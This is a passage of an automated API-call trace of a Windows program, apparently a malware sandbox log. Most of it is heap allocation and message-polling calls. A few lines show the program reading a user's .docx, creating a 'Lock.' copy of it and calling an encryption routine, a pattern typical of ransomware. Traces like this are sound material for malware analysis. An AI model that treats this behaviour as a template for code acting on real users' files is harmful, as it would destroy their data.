hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0264.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0264.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14b00 | out: hHeap=0x970000) returned 1 [0264.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0264.891] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0264.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0264.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0264.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0264.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0264.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0264.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0264.892] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0264.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0264.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0264.892] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0264.892] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0264.892] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0264.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0264.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0264.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0264.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0264.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0264.892] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0264.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0264.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0264.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0264.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0264.893] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/kZP09G.docx" (normalized: "c:\\users\\fd1hvy\\documents\\kzp09g.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0264.893] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0264.893] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0264.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0264.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0264.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0264.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0264.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0264.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0264.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0264.894] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0264.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0264.894] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0264.894] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0264.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0264.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0264.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0264.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0264.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0264.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0264.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0264.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e565e8 [0264.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0264.895] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0264.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0264.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0264.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be08a8 [0264.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0264.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.895] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.kZP09G.docx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.kzp09g.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0264.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0264.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0264.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0264.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0264.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0264.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0264.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0264.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0264.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0264.896] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0264.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0264.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0264.896] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0264.896] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0264.896] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0264.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0264.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0264.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0264.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0264.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0264.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0264.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0264.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0264.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0264.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0264.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0264.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0264.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0264.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0264.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x125e020 [0264.901] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0264.901] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x5c4b, lpOverlapped=0x0) returned 1 [0264.903] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0264.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0264.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0264.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0264.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0264.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5c4b) returned 0x2f16018 [0264.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x125e020 | out: hHeap=0x970000) returned 1 [0264.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0264.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0264.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0264.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0264.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0264.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0264.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0264.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5c4b) returned 0x2f1bc70 [0264.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0264.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0264.908] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0264.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0264.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0264.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0264.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5c4b) returned 0x2f16018 [0264.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0264.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0264.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0264.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0264.908] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0264.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0264.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0264.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0264.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0264.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0264.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0264.925] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0264.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0264.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0264.925] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0264.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0264.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0264.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0264.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54da8 [0264.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0264.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0264.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0264.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0264.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5c4b) returned 0x2f16018 [0264.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f78 [0264.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0264.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0264.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0264.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ff8 [0264.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0264.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0264.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0264.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55008 [0264.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0264.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0264.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0264.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0264.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0264.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0264.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0264.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0264.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5c4b) returned 0x2f218c8 [0264.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0264.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0264.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0264.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0264.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0264.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0264.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0264.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0264.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0264.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0264.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0264.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0264.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0264.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0264.927] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.928] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.928] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | 